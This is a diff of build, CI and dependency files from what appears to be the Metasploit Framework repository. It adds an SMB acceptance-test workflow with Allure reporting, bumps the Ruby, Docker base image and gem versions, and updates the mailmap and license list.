+          # Nokogiri doesn't release pre-compiled binaries for preview versions of Ruby; So force compilation with BUNDLE_FORCE_RUBY_PLATFORM
+          BUNDLE_FORCE_RUBY_PLATFORM: "${{ contains(matrix.ruby, 'preview') && 'true' || 'false' }}"
+        uses: ruby/setup-ruby@v1
+        with:
+          ruby-version: '${{ matrix.ruby }}'
+          bundler-cache: true
+
+      - name: acceptance
+        env:
+          SPEC_HELPER_LOAD_METASPLOIT: false
+          SPEC_OPTS: "--tag acceptance --require acceptance_spec_helper.rb --color --format documentation --format AllureRspec::RSpecFormatter"
+          RUNTIME_VERSION: 'latest'
+        # Unix run command:
+        #   SPEC_HELPER_LOAD_METASPLOIT=false bundle exec ./spec/acceptance
+        # Windows cmd command:
+        #   set SPEC_HELPER_LOAD_METASPLOIT=false
+        #   bundle exec rspec .\spec\acceptance
+        # Note: rspec retry is intentionally not used, as it can cause issues with allure's reporting
+        # Additionally - flakey tests should be fixed or marked as flakey instead of silently retried
+        run: |
+          bundle exec rspec spec/acceptance/smb_spec.rb
+
+      - name: Archive results
+        if: always()
+        uses: actions/upload-artifact@v4
+        with:
+          # Provide a unique artifact for each matrix os, otherwise race conditions can lead to corrupt zips
+          name: smb_acceptance-${{ matrix.os }}
+          path: tmp/allure-raw-data
+
+  # Generate a final report from the previous test results
+  report:
+    name: Generate report
+    needs:
+      - smb
+    runs-on: ubuntu-latest
+    if: always()
+
+    steps:
+      - name: Checkout code
+        uses: actions/checkout@v4
+        if: always()
+
+      - name: Install system dependencies (Linux)
+        if: always()
+        run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz
+
+      - name: Setup Ruby
+        if: always()
+        env:
+          BUNDLE_FORCE_RUBY_PLATFORM: true
+        uses: ruby/setup-ruby@v1
+        with:
+          ruby-version: '${{ matrix.ruby }}'
+          bundler-cache: true
+          cache-version: 4
+          # Github actions with Ruby requires Bundler 2.2.18+
+          # https://github.com/ruby/setup-ruby/tree/d2b39ad0b52eca07d23f3aa14fdf2a3fcc1f411c#windows
+          bundler: 2.2.33
+
+      - uses: actions/download-artifact@v4
+        id: download
+        if: always()
+        with:
+          # Note: Not specifying a name will download all artifacts from the previous workflow jobs
+          path: raw-data
+
+      - name: allure generate
+        if: always()
+        run: |
+          export VERSION=2.22.1
+
+          curl -o allure-$VERSION.tgz -Ls https://github.com/allure-framework/allure2/releases/download/$VERSION/allure-$VERSION.tgz
+          tar -zxvf allure-$VERSION.tgz -C .
+
+          ls -la ${{steps.download.outputs.download-path}}
+          ./allure-$VERSION/bin/allure generate ${{steps.download.outputs.download-path}}/* -o ./allure-report
+
+          find ${{steps.download.outputs.download-path}}
+          bundle exec ruby tools/dev/report_generation/support_matrix/generate.rb --allure-data ${{steps.download.outputs.download-path}} > ./allure-report/support_matrix.html
+
+      - name: archive results
+        if: always()
+        uses: actions/upload-artifact@v4
+        with:
+          name: final-report-${{ github.run_id }}
+          path: |
+            ./allure-report
@@ -33,7 +33,7 @@ jobs:
    name: Docker Build
    steps:
      - name: Checkout code
-        uses: actions/checkout@v3
+        uses: actions/checkout@v4

      - name: docker-compose build
        run: |
@@ -64,19 +64,16 @@ jobs:
      fail-fast: true
      matrix:
        ruby:
-          - '3.0'
          - '3.1'
          - '3.2'
-          - '3.3.0-preview3'
+          - '3.3'
+          - '3.4.0-preview1'
        os:
          - ubuntu-20.04
          - ubuntu-latest
        exclude:
          - { os: ubuntu-latest, ruby: '3.0' }
        include:
-          - os: ubuntu-latest
-            ruby: '3.1'
-            test_cmd: 'bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" MSF_FEATURE_DATASTORE_FALLBACKS=1'
          - os: ubuntu-latest
            ruby: '3.1'
            test_cmd: 'bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" MSF_FEATURE_DEFER_MODULE_LOADS=1'
@@ -89,6 +86,7 @@ jobs:

    env:
      RAILS_ENV: test
+      BUNDLE_WITHOUT: "coverage development pcap"

    name: ${{ matrix.os }} - Ruby ${{ matrix.ruby }} - ${{ matrix.test_cmd }}
    steps:
@@ -96,11 +94,10 @@ jobs:
        run: sudo apt-get install -y --no-install-recommends libpcap-dev graphviz

      - name: Checkout code
-        uses: actions/checkout@v3
+        uses: actions/checkout@v4

      - name: Setup Ruby
        env:
-          BUNDLE_WITHOUT: "coverage development pcap"
          # Nokogiri doesn't release pre-compiled binaries for preview versions of Ruby; So force compilation with BUNDLE_FORCE_RUBY_PLATFORM
          BUNDLE_FORCE_RUBY_PLATFORM: "${{ contains(matrix.ruby, 'preview') && 'true' || 'false' }}"
        uses: ruby/setup-ruby@v1
@@ -1,4 +1,5 @@
 adfoster-r7 <adfoster-r7@github>       <alandavid_foster@rapid7.com>
+adeherdt-r7 <adeherdt-r7@github>       Arne De Herdt <arne_deherdt@rapid7.com>
 bwatters-r7 <bwatters-r7@github>       <bwatters@rapid7.com>
 cdelafuente-r7 <cdelafuente-r7@github> Christophe De La Fuente <christophe_delafuente@rapid7.com>
 cdoughty-r7 <cdoughty-r7@github>       <chris_doughty@rapid7.com>
@@ -15,6 +16,7 @@ space-r7 <space-r7@github>             <shelby_pace@rapid7.com>
 todb-r7 <todb-r7@github>               <tod_beardsley@rapid7.com>
 todb-r7 <todb-r7@github>               <todb@metasploit.com>
 todb-r7 <todb-r7@github>               <todb@packetfu.com>
+dledda-r7 <dledda-r7@github>           <diego_ledda@rapid7.com>

 # Above this line are current Rapid7 employees. Below this paragraph are
 # volunteers, former employees, and potential Rapid7 employees who, at
@@ -9,7 +9,7 @@
 # inherit_from: .rubocop_todo.yml

 AllCops:
-  TargetRubyVersion: 2.6
+  TargetRubyVersion: 2.7
  SuggestExtensions: false
  NewCops: disable

@@ -1 +1 @@
-3.0.5
+3.1.5
@@ -1,7 +1,8 @@
-FROM ruby:3.1.4-alpine3.18 AS builder
+FROM ruby:3.1.5-alpine3.18 AS builder
 LABEL maintainer="Rapid7"

-ARG BUNDLER_CONFIG_ARGS="set clean 'true' set no-cache 'true' set system 'true' set without 'development test coverage'"
+ARG BUNDLER_CONFIG_ARGS="set no-cache 'true' set system 'true' set without 'development test coverage'"
+ARG BUNDLER_FORCE_CLEAN="true"
 ENV APP_HOME=/usr/src/metasploit-framework
 ENV TOOLS_HOME=/usr/src/tools
 ENV BUNDLE_IGNORE_MESSAGES="true"
@@ -33,8 +34,11 @@ RUN apk add --no-cache \
      go \
    && echo "gem: --no-document" > /etc/gemrc \
    && gem update --system \
-    && bundle config $BUNDLER_ARGS \
+    && bundle config $BUNDLER_CONFIG_ARGS \
    && bundle install --jobs=8 \
+    && if [ "${BUNDLER_FORCE_CLEAN}" == "true" ]; then \
+         bundle clean --force; \
+       fi \
    # temp fix for https://github.com/bundler/bundler/issues/6680
    && rm -rf /usr/local/bundle/cache \
    # needed so non root users can read content of the bundle
@@ -49,7 +53,7 @@ RUN mkdir -p $TOOLS_HOME/bin && \
    cd go/src && \
    ./make.bash

-FROM ruby:3.1.4-alpine3.18
+FROM ruby:3.1.5-alpine3.18
 LABEL maintainer="Rapid7"
 ARG TARGETARCH

@@ -1,7 +1,9 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (6.3.55)
+    metasploit-framework (6.4.22)
+      aarch64
+      abbrev
      actionpack (~> 7.0.0)
      activerecord (~> 7.0.0)
      activesupport (~> 7.0.0)
@@ -10,20 +12,26 @@ PATH
      aws-sdk-iam
      aws-sdk-s3
      aws-sdk-ssm
+      base64
      bcrypt
      bcrypt_pbkdf
+      bigdecimal
      bootsnap
      bson
      chunky_png
+      csv
      dnsruby
+      drb
      ed25519
      em-http-request
      eventmachine
      faker
-      faraday
+      faraday (= 2.7.11)
      faraday-retry
      faye-websocket
+      ffi (< 1.17.0)
      filesize
+      getoptlong
      hrr_rb_ssh-ed25519
      http-cookie
      irb (~> 1.7.4)
@@ -33,19 +41,21 @@ PATH
      metasploit-concern
      metasploit-credential
      metasploit-model
-      metasploit-payloads (= 2.0.165)
+      metasploit-payloads (= 2.0.166)
      metasploit_data_models
-      metasploit_payloads-mettle (= 1.0.26)
+      metasploit_payloads-mettle (= 1.0.31)
      mqtt
      msgpack (~> 1.6.0)
+      mutex_m
      nessus_rest
      net-imap
      net-ldap
+      net-sftp
      net-smtp
      net-ssh
      network_interface
      nexpose
-      nokogiri (~> 1.14.0)
+      nokogiri
      octokit (~> 4.0)
      openssl-ccm
      openvas-omp
@@ -81,11 +91,11 @@ PATH
      rex-zip
      ruby-macho
      ruby-mysql
-      ruby_smb (~> 3.3.0)
+      ruby_smb (~> 3.3.3)
      rubyntlm
      rubyzip
      sinatra
-      sqlite3
+      sqlite3 (= 1.7.3)
      sshkey
      swagger-blocks
      thin
@@ -103,37 +113,40 @@ PATH
 GEM
  remote: https://rubygems.org/
  specs:
-    Ascii85 (1.1.0)
-    actionpack (7.0.8)
-      actionview (= 7.0.8)
-      activesupport (= 7.0.8)
+    Ascii85 (1.1.1)
+    aarch64 (2.1.0)
+      racc (~> 1.6)
+    abbrev (0.1.2)
+    actionpack (7.0.8.4)
+      actionview (= 7.0.8.4)
+      activesupport (= 7.0.8.4)
      rack (~> 2.0, >= 2.2.4)
      rack-test (>= 0.6.3)
      rails-dom-testing (~> 2.0)
      rails-html-sanitizer (~> 1.0, >= 1.2.0)
-    actionview (7.0.8)
-      activesupport (= 7.0.8)
+    actionview (7.0.8.4)
+      activesupport (= 7.0.8.4)
      builder (~> 3.1)
      erubi (~> 1.4)
      rails-dom-testing (~> 2.0)
      rails-html-sanitizer (~> 1.1, >= 1.2.0)
-    activemodel (7.0.8)
-      activesupport (= 7.0.8)
-    activerecord (7.0.8)
-      activemodel (= 7.0.8)
-      activesupport (= 7.0.8)
-    activesupport (7.0.8)
+    activemodel (7.0.8.4)
+      activesupport (= 7.0.8.4)
+    activerecord (7.0.8.4)
+      activemodel (= 7.0.8.4)
+      activesupport (= 7.0.8.4)
+    activesupport (7.0.8.4)
      concurrent-ruby (~> 1.0, >= 1.0.2)
      i18n (>= 1.6, < 2)
      minitest (>= 5.1)
      tzinfo (~> 2.0)
-    addressable (2.8.5)
+    addressable (2.8.6)
      public_suffix (>= 2.0.2, < 6.0)
    afm (0.2.2)
-    allure-rspec (2.23.0)
-      allure-ruby-commons (= 2.23.0)
+    allure-rspec (2.24.5)
+      allure-ruby-commons (= 2.24.5)
      rspec-core (>= 3.8, < 4)
-    allure-ruby-commons (2.23.0)
+    allure-ruby-commons (2.24.5)
      mime-types (>= 3.3, < 4)
      require_all (>= 2, < 4)
      rspec-expectations (~> 3.12)
@@ -141,59 +154,61 @@ GEM
    arel-helpers (2.14.0)
      activerecord (>= 3.1.0, < 8)
    ast (2.4.2)
-    aws-eventstream (1.2.0)
-    aws-partitions (1.834.0)
-    aws-sdk-core (3.185.1)
-      aws-eventstream (~> 1, >= 1.0.2)
+    aws-eventstream (1.3.0)
+    aws-partitions (1.941.0)
+    aws-sdk-core (3.197.0)
+      aws-eventstream (~> 1, >= 1.3.0)
      aws-partitions (~> 1, >= 1.651.0)
-      aws-sigv4 (~> 1.5)
+      aws-sigv4 (~> 1.8)
      jmespath (~> 1, >= 1.6.1)
-    aws-sdk-ec2 (1.411.0)
-      aws-sdk-core (~> 3, >= 3.184.0)
+    aws-sdk-ec2 (1.460.0)
+      aws-sdk-core (~> 3, >= 3.197.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-ec2instanceconnect (1.34.0)
-      aws-sdk-core (~> 3, >= 3.184.0)
+    aws-sdk-ec2instanceconnect (1.41.0)
+      aws-sdk-core (~> 3, >= 3.197.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-iam (1.87.0)
-      aws-sdk-core (~> 3, >= 3.184.0)
+    aws-sdk-iam (1.99.0)
+      aws-sdk-core (~> 3, >= 3.197.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-kms (1.72.0)
-      aws-sdk-core (~> 3, >= 3.184.0)
+    aws-sdk-kms (1.83.0)
+      aws-sdk-core (~> 3, >= 3.197.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-s3 (1.136.0)
-      aws-sdk-core (~> 3, >= 3.181.0)
+    aws-sdk-s3 (1.152.0)
+      aws-sdk-core (~> 3, >= 3.197.0)
      aws-sdk-kms (~> 1)
-      aws-sigv4 (~> 1.6)
-    aws-sdk-ssm (1.158.0)
-      aws-sdk-core (~> 3, >= 3.184.0)
+      aws-sigv4 (~> 1.8)
+    aws-sdk-ssm (1.170.0)
+      aws-sdk-core (~> 3, >= 3.197.0)
      aws-sigv4 (~> 1.1)
-    aws-sigv4 (1.6.0)
+    aws-sigv4 (1.8.0)
      aws-eventstream (~> 1, >= 1.0.2)
-    base64 (0.1.1)
-    bcrypt (3.1.19)
-    bcrypt_pbkdf (1.1.0)
+    base64 (0.2.0)
+    bcrypt (3.1.20)
+    bcrypt_pbkdf (1.1.1)
+    bigdecimal (3.1.8)
    bindata (2.4.15)
-    bootsnap (1.16.0)
+    bootsnap (1.18.3)
      msgpack (~> 1.2)
-    bson (4.15.0)
+    bson (5.0.0)
    builder (3.2.4)
    byebug (11.1.3)
    chunky_png (1.4.0)
    coderay (1.1.3)
-    concurrent-ruby (1.2.2)
-    cookiejar (0.3.3)
+    concurrent-ruby (1.3.1)
+    cookiejar (0.3.4)
    crass (1.0.6)
+    csv (3.3.0)
    daemons (1.4.1)
-    date (3.3.3)
+    date (3.3.4)
    debug (1.8.0)
      irb (>= 1.5.0)
      reline (>= 0.3.1)
-    diff-lcs (1.5.0)
-    dnsruby (1.70.0)
+    diff-lcs (1.5.1)
+    dnsruby (1.72.1)
      simpleidn (~> 0.2.1)
    docile (1.4.0)
-    domain_name (0.5.20190701)
-      unf (>= 0.0.5, < 1.0.0)
+    domain_name (0.6.20240107)
+    drb (2.2.1)
    ed25519 (1.3.0)
    em-http-request (1.1.7)
      addressable (>= 2.3.4)
@@ -205,19 +220,19 @@ GEM
      eventmachine (>= 1.0.0.beta.4)
    erubi (1.12.0)
    eventmachine (1.2.7)
-    factory_bot (6.2.1)
+    factory_bot (6.4.6)
      activesupport (>= 5.0.0)
-    factory_bot_rails (6.2.0)
-      factory_bot (~> 6.2.0)
+    factory_bot_rails (6.4.3)
+      factory_bot (~> 6.4)
      railties (>= 5.0.0)
-    faker (3.2.1)
+    faker (3.4.1)
      i18n (>= 1.8.11, < 2)
    faraday (2.7.11)
      base64
      faraday-net_http (>= 2.0, < 3.1)
      ruby2_keywords (>= 0.0.4)
    faraday-net_http (3.0.2)
-    faraday-retry (2.2.0)
+    faraday-retry (2.2.1)
      faraday (~> 2.0)
    faye-websocket (0.11.3)
      eventmachine (>= 0.12.0)
@@ -225,6 +240,7 @@ GEM
    ffi (1.16.3)
    filesize (0.2.0)
    fivemat (1.3.7)
+    getoptlong (0.2.1)
    gssapi (1.3.1)
      ffi (>= 1.0.1)
    gyoku (1.4.0)
@@ -235,25 +251,25 @@ GEM
    hrr_rb_ssh-ed25519 (0.4.2)
      ed25519 (~> 1.2)
      hrr_rb_ssh (>= 0.4)
-    http-cookie (1.0.5)
+    http-cookie (1.0.6)
      domain_name (~> 0.5)
    http_parser.rb (0.8.0)
    httpclient (2.8.3)
-    i18n (1.14.1)
+    i18n (1.14.5)
      concurrent-ruby (~> 1.0)
-    io-console (0.6.0)
+    io-console (0.7.2)
    irb (1.7.4)
      reline (>= 0.3.6)
    jmespath (1.6.2)
    jsobfu (0.4.2)
      rkelly-remix
-    json (2.6.3)
+    json (2.7.2)
    language_server-protocol (3.17.0.3)
    little-plugger (1.1.4)
-    logging (2.3.1)
+    logging (2.4.0)
      little-plugger (~> 1.1)
      multi_json (~> 1.14)
-    loofah (2.21.3)
+    loofah (2.22.0)
      crass (~> 1.0.2)
      nokogiri (>= 1.12.0)
    macaddr (1.7.2)
@@ -265,7 +281,7 @@ GEM
      activesupport (~> 7.0)
      railties (~> 7.0)
      zeitwerk
-    metasploit-credential (6.0.6)
+    metasploit-credential (6.0.9)
      metasploit-concern
      metasploit-model
      metasploit_data_models (>= 5.0.0)
@@ -279,7 +295,7 @@ GEM
      activemodel (~> 7.0)
      activesupport (~> 7.0)
      railties (~> 7.0)
-    metasploit-payloads (2.0.165)
+    metasploit-payloads (2.0.166)
    metasploit_data_models (6.0.3)
      activerecord (~> 7.0)
      activesupport (~> 7.0)
@@ -290,35 +306,39 @@ GEM
      railties (~> 7.0)
      recog
      webrick
-    metasploit_payloads-mettle (1.0.26)
-    method_source (1.0.0)
-    mime-types (3.5.1)
+    metasploit_payloads-mettle (1.0.31)
+    method_source (1.1.0)
+    mime-types (3.5.2)
      mime-types-data (~> 3.2015)
-    mime-types-data (3.2023.1003)
-    mini_portile2 (2.8.4)
-    minitest (5.20.0)
+    mime-types-data (3.2024.0604)
+    mini_portile2 (2.8.7)
+    minitest (5.23.1)
    mqtt (0.6.0)
    msgpack (1.6.1)
    multi_json (1.15.0)
    mustermann (3.0.0)
      ruby2_keywords (~> 0.0.1)
+    mutex_m (0.2.0)
    nessus_rest (0.1.6)
-    net-imap (0.4.0)
+    net-imap (0.4.12)
      date
      net-protocol
-    net-ldap (0.18.0)
-    net-protocol (0.2.1)
+    net-ldap (0.19.0)
+    net-protocol (0.2.2)
      timeout
-    net-smtp (0.4.0)
+    net-sftp (4.0.0)
+      net-ssh (>= 5.0.0, < 8.0.0)
+    net-smtp (0.5.0)
      net-protocol
-    net-ssh (7.2.0)
+    net-ssh (7.2.3)
    network_interface (0.0.4)
    nexpose (7.3.0)
-    nio4r (2.5.9)
-    nokogiri (1.14.5)
-      mini_portile2 (~> 2.8.0)
+    nio4r (2.7.3)
+    nokogiri (1.16.5)
+      mini_portile2 (~> 2.8.2)
      racc (~> 1.4)
-    nori (2.6.0)
+    nori (2.7.0)
+      bigdecimal
    octokit (4.25.1)
      faraday (>= 1, < 3)
      sawyer (~> 0.9)
@@ -327,31 +347,32 @@ GEM
    openvas-omp (0.0.4)
    packetfu (2.0.0)
      pcaprub (~> 0.13.1)
-    parallel (1.23.0)
-    parser (3.2.2.4)
+    parallel (1.24.0)
+    parser (3.3.2.0)
      ast (~> 2.4.1)
      racc
    patch_finder (1.0.2)
-    pcaprub (0.13.1)
-    pdf-reader (2.11.0)
+    pcaprub (0.13.3)
+    pdf-reader (2.12.0)
      Ascii85 (~> 1.0)
      afm (~> 0.2.1)
      hashery (~> 2.0)
      ruby-rc4
      ttfunk
-    pg (1.5.4)
+    pg (1.5.6)
    pry (0.14.2)
      coderay (~> 1.1)
      method_source (~> 1.0)
    pry-byebug (3.10.1)
      byebug (~> 11.0)
      pry (>= 0.13, < 0.15)
-    public_suffix (5.0.3)
-    puma (6.4.0)
+    public_suffix (5.0.5)
+    puma (6.4.2)
      nio4r (~> 2.0)
-    racc (1.7.1)
-    rack (2.2.8)
-    rack-protection (3.1.0)
+    racc (1.8.0)
+    rack (2.2.9)
+    rack-protection (3.2.0)
+      base64 (>= 0.1.0)
      rack (~> 2.2, >= 2.2.4)
    rack-test (2.1.0)
      rack (>= 1.3)
@@ -362,23 +383,23 @@ GEM
    rails-html-sanitizer (1.6.0)
      loofah (~> 2.21)
      nokogiri (~> 1.14)
-    railties (7.0.8)
-      actionpack (= 7.0.8)
-      activesupport (= 7.0.8)
+    railties (7.0.8.4)
+      actionpack (= 7.0.8.4)
+      activesupport (= 7.0.8.4)
      method_source
      rake (>= 12.2)
      thor (~> 1.0)
      zeitwerk (~> 2.5)
    rainbow (3.1.1)
-    rake (13.0.6)
-    rasn1 (0.12.1)
+    rake (13.2.1)
+    rasn1 (0.13.0)
      strptime (~> 0.2.5)
    rb-readline (0.5.5)
-    recog (3.1.2)
+    recog (3.1.5)
      nokogiri
    redcarpet (3.6.0)
-    regexp_parser (2.8.1)
-    reline (0.4.1)
+    regexp_parser (2.9.2)
+    reline (0.5.8)
      io-console (~> 0.5)
    require_all (3.0.0)
    rex-arch (0.1.15)
@@ -389,7 +410,7 @@ GEM
      rex-core
      rex-struct2
      rex-text
-    rex-core (0.1.31)
+    rex-core (0.1.32)
    rex-encoder (0.1.7)
      metasm
      rex-arch
@@ -412,75 +433,76 @@ GEM
      rex-random_identifier
      rex-text
      ruby-rc4
-    rex-random_identifier (0.1.11)
+    rex-random_identifier (0.1.12)
      rex-text
    rex-registry (0.1.5)
    rex-rop_builder (0.1.5)
      metasm
      rex-core
      rex-text
-    rex-socket (0.1.55)
+    rex-socket (0.1.57)
      rex-core
    rex-sslscan (0.1.10)
      rex-core
      rex-socket
      rex-text
    rex-struct2 (0.1.4)
-    rex-text (0.2.53)
+    rex-text (0.2.58)
    rex-zip (0.1.5)
      rex-text
-    rexml (3.2.6)
+    rexml (3.2.8)
+      strscan (>= 3.0.9)
    rkelly-remix (0.0.7)
-    rspec (3.12.0)
-      rspec-core (~> 3.12.0)
-      rspec-expectations (~> 3.12.0)
-      rspec-mocks (~> 3.12.0)
-    rspec-core (3.12.2)
-      rspec-support (~> 3.12.0)
-    rspec-expectations (3.12.3)
+    rspec (3.13.0)
+      rspec-core (~> 3.13.0)
+      rspec-expectations (~> 3.13.0)
+      rspec-mocks (~> 3.13.0)
+    rspec-core (3.13.0)
+      rspec-support (~> 3.13.0)
+    rspec-expectations (3.13.0)
      diff-lcs (>= 1.2.0, < 2.0)
-      rspec-support (~> 3.12.0)
-    rspec-mocks (3.12.6)
+      rspec-support (~> 3.13.0)
+    rspec-mocks (3.13.1)
      diff-lcs (>= 1.2.0, < 2.0)
-      rspec-support (~> 3.12.0)
-    rspec-rails (6.0.3)
+      rspec-support (~> 3.13.0)
+    rspec-rails (6.1.2)
      actionpack (>= 6.1)
      activesupport (>= 6.1)
      railties (>= 6.1)
-      rspec-core (~> 3.12)
-      rspec-expectations (~> 3.12)
-      rspec-mocks (~> 3.12)
-      rspec-support (~> 3.12)
+      rspec-core (~> 3.13)
+      rspec-expectations (~> 3.13)
+      rspec-mocks (~> 3.13)
+      rspec-support (~> 3.13)
    rspec-rerun (1.1.0)
      rspec (~> 3.0)
-    rspec-support (3.12.1)
-    rubocop (1.56.4)
-      base64 (~> 0.1.1)
+    rspec-support (3.13.1)
+    rubocop (1.64.1)
      json (~> 2.3)
      language_server-protocol (>= 3.17.0)
      parallel (~> 1.10)
-      parser (>= 3.2.2.3)
+      parser (>= 3.3.0.2)
      rainbow (>= 2.2.2, < 4.0)
      regexp_parser (>= 1.8, < 3.0)
      rexml (>= 3.2.5, < 4.0)
-      rubocop-ast (>= 1.28.1, < 2.0)
+      rubocop-ast (>= 1.31.1, < 2.0)
      ruby-progressbar (~> 1.7)
      unicode-display_width (>= 2.4.0, < 3.0)
-    rubocop-ast (1.29.0)
-      parser (>= 3.2.1.0)
-    ruby-macho (4.0.0)
+    rubocop-ast (1.31.3)
+      parser (>= 3.3.1.0)
+    ruby-macho (4.0.1)
    ruby-mysql (4.1.0)
    ruby-prof (1.4.2)
    ruby-progressbar (1.13.0)
    ruby-rc4 (0.1.5)
    ruby2_keywords (0.0.5)
-    ruby_smb (3.3.2)
-      bindata
+    ruby_smb (3.3.9)
+      bindata (= 2.4.15)
      openssl-ccm
      openssl-cmac
      rubyntlm
      windows_error (>= 0.1.4)
-    rubyntlm (0.6.3)
+    rubyntlm (0.6.4)
+      base64
    rubyzip (2.3.2)
    sawyer (0.9.2)
      addressable (>= 2.3.5)
@@ -489,36 +511,34 @@ GEM
      docile (~> 1.1)
      simplecov-html (~> 0.11)
    simplecov-html (0.12.3)
-    simpleidn (0.2.1)
-      unf (~> 0.1.4)
-    sinatra (3.1.0)
+    simpleidn (0.2.3)
+    sinatra (3.2.0)
      mustermann (~> 3.0)
      rack (~> 2.2, >= 2.2.4)
-      rack-protection (= 3.1.0)
+      rack-protection (= 3.2.0)
      tilt (~> 2.0)
-    sqlite3 (1.6.6)
+    sqlite3 (1.7.3)
      mini_portile2 (~> 2.8.0)
    sshkey (3.0.0)
    strptime (0.2.5)
+    strscan (3.1.0)
    swagger-blocks (3.0.0)
    systemu (2.6.5)
-    test-prof (1.2.3)
+    test-prof (1.3.3)
    thin (1.8.2)
      daemons (~> 1.0, >= 1.0.9)
      eventmachine (~> 1.0, >= 1.0.4)
      rack (>= 1, < 3)
-    thor (1.2.2)
+    thor (1.3.1)
    tilt (2.3.0)
-    timecop (0.9.8)
-    timeout (0.4.0)
-    ttfunk (1.7.0)
+    timecop (0.9.9)
+    timeout (0.4.1)
+    ttfunk (1.8.0)
+      bigdecimal (~> 3.1)
    tzinfo (2.0.6)
      concurrent-ruby (~> 1.0)
-    tzinfo-data (1.2023.3)
+    tzinfo-data (1.2024.1)
      tzinfo (>= 1.0.0)
-    unf (0.1.4)
-      unf_ext
-    unf_ext (0.0.8.2)
    unicode-display_width (2.5.0)
    unix-crypt (1.3.1)
    uuid (2.3.9)
@@ -545,8 +565,8 @@ GEM
      activesupport (>= 4.2, < 8.0)
    xmlrpc (0.3.3)
      webrick
-    yard (0.9.34)
-    zeitwerk (2.6.12)
+    yard (0.9.36)
+    zeitwerk (2.6.15)

 PLATFORMS
  ruby
@@ -1,144 +1,152 @@
 This file is auto-generated by tools/dev/update_gem_licenses.sh
-Ascii85, 1.1.0, MIT
-actionpack, 7.0.8, MIT
-actionview, 7.0.8, MIT
-activemodel, 7.0.8, MIT
-activerecord, 7.0.8, MIT
-activesupport, 7.0.8, MIT
-addressable, 2.8.5, "Apache 2.0"
+Ascii85, 1.1.1, MIT
+aarch64, 2.1.0, "Apache 2.0"
+abbrev, 0.1.2, "ruby, Simplified BSD"
+actionpack, 7.0.8.4, MIT
+actionview, 7.0.8.4, MIT
+activemodel, 7.0.8.4, MIT
+activerecord, 7.0.8.4, MIT
+activesupport, 7.0.8.4, MIT
+addressable, 2.8.6, "Apache 2.0"
 afm, 0.2.2, MIT
-allure-rspec, 2.23.0, "Apache 2.0"
-allure-ruby-commons, 2.23.0, "Apache 2.0"
+allure-rspec, 2.24.5, "Apache 2.0"
+allure-ruby-commons, 2.24.5, "Apache 2.0"
 arel-helpers, 2.14.0, MIT
 ast, 2.4.2, MIT
-aws-eventstream, 1.2.0, "Apache 2.0"
-aws-partitions, 1.834.0, "Apache 2.0"
-aws-sdk-core, 3.185.1, "Apache 2.0"
-aws-sdk-ec2, 1.411.0, "Apache 2.0"
-aws-sdk-ec2instanceconnect, 1.34.0, "Apache 2.0"
-aws-sdk-iam, 1.87.0, "Apache 2.0"
-aws-sdk-kms, 1.72.0, "Apache 2.0"
-aws-sdk-s3, 1.136.0, "Apache 2.0"
-aws-sdk-ssm, 1.158.0, "Apache 2.0"
-aws-sigv4, 1.6.0, "Apache 2.0"
-base64, 0.1.1, "ruby, Simplified BSD"
-bcrypt, 3.1.19, MIT
-bcrypt_pbkdf, 1.1.0, MIT
+aws-eventstream, 1.3.0, "Apache 2.0"
+aws-partitions, 1.941.0, "Apache 2.0"
+aws-sdk-core, 3.197.0, "Apache 2.0"
+aws-sdk-ec2, 1.460.0, "Apache 2.0"
+aws-sdk-ec2instanceconnect, 1.41.0, "Apache 2.0"
+aws-sdk-iam, 1.99.0, "Apache 2.0"
+aws-sdk-kms, 1.83.0, "Apache 2.0"
+aws-sdk-s3, 1.152.0, "Apache 2.0"
+aws-sdk-ssm, 1.170.0, "Apache 2.0"
+aws-sigv4, 1.8.0, "Apache 2.0"
+base64, 0.2.0, "ruby, Simplified BSD"
+bcrypt, 3.1.20, MIT
+bcrypt_pbkdf, 1.1.1, MIT
+bigdecimal, 3.1.8, "ruby, Simplified BSD"
 bindata, 2.4.15, "Simplified BSD"
-bootsnap, 1.16.0, MIT
-bson, 4.15.0, "Apache 2.0"
+bootsnap, 1.18.3, MIT
+bson, 5.0.0, "Apache 2.0"
 builder, 3.2.4, MIT
-bundler, 2.1.4, MIT
+bundler, 2.2.3, MIT
 byebug, 11.1.3, "Simplified BSD"
 chunky_png, 1.4.0, MIT
 coderay, 1.1.3, MIT
-concurrent-ruby, 1.2.2, MIT
-cookiejar, 0.3.3, unknown
+concurrent-ruby, 1.3.1, MIT
+cookiejar, 0.3.4, "Simplified BSD"
 crass, 1.0.6, MIT
+csv, 3.3.0, "ruby, Simplified BSD"
 daemons, 1.4.1, MIT
-date, 3.3.3, "ruby, Simplified BSD"
+date, 3.3.4, "ruby, Simplified BSD"
 debug, 1.8.0, "ruby, Simplified BSD"
-diff-lcs, 1.5.0, "MIT, Artistic-2.0, GPL-2.0+"
-dnsruby, 1.70.0, "Apache 2.0"
+diff-lcs, 1.5.1, "MIT, Artistic-2.0, GPL-2.0-or-later"
+dnsruby, 1.72.1, "Apache 2.0"
 docile, 1.4.0, MIT
-domain_name, 0.5.20190701, "Simplified BSD, New BSD, Mozilla Public License 2.0"
+domain_name, 0.6.20240107, "Simplified BSD, New BSD, Mozilla Public License 2.0"
+drb, 2.2.1, "ruby, Simplified BSD"
 ed25519, 1.3.0, MIT
 em-http-request, 1.1.7, MIT
 em-socksify, 0.3.2, MIT
 erubi, 1.12.0, MIT
 eventmachine, 1.2.7, "ruby, GPL-2.0"
-factory_bot, 6.2.1, MIT
-factory_bot_rails, 6.2.0, MIT
-faker, 3.2.1, MIT
+factory_bot, 6.4.6, MIT
+factory_bot_rails, 6.4.3, MIT
+faker, 3.4.1, MIT
 faraday, 2.7.11, MIT
 faraday-net_http, 3.0.2, MIT
-faraday-retry, 2.2.0, MIT
+faraday-retry, 2.2.1, MIT
 faye-websocket, 0.11.3, "Apache 2.0"
 ffi, 1.16.3, "New BSD"
 filesize, 0.2.0, MIT
 fivemat, 1.3.7, MIT
+getoptlong, 0.2.1, "ruby, Simplified BSD"
 gssapi, 1.3.1, MIT
 gyoku, 1.4.0, MIT
 hashery, 2.1.2, "Simplified BSD"
 hrr_rb_ssh, 0.4.2, "Apache 2.0"
